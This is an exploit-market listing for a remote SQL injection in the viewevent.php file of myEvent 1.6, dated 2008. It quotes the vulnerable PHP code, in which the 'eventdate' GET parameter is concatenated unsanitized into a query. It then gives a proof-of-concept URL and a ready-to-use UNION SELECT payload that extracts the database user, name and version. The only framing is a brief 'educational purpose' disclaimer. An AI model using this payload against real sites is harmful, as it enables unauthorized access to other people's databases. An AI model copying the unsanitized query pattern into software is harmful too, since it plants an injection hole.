[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

myEvent 1.6 (viewevent.php) Remote SQL Injection Vulnerability

Author
JosS
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3898
Category
web applications
Date add
14-10-2008
Platform
unsorted
==============================================================
myEvent 1.6 (viewevent.php) Remote SQL Injection Vulnerability
==============================================================


# myEvent 1.6 (viewevent.php) Remote SQL Injection Vulnerability
# url: http://mywebland.com/
#
# Author: JosS
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
# Greetz To: All Hackers and milw0rm website

vuln file: /viewevent.php
vuln code:
43: if (isset($_GET['eventdate']))
xx: ...
93: $sql = "SELECT  * FROM event WHERE  date = '$eventdate'" ;

94: $results = mysql_query($sql) or die("Cannot query the database.<br>" . mysql_error());

95: $event  = mysql_num_rows($results);

PoC:     /viewevent.php?eventdate='[foo]
Exploit: /viewevent.php?eventdate='+union+all+select+1,1,concat(user(),char(32,35),database(),char(32,35),version())/*



#  0day.today [2024-12-25]  #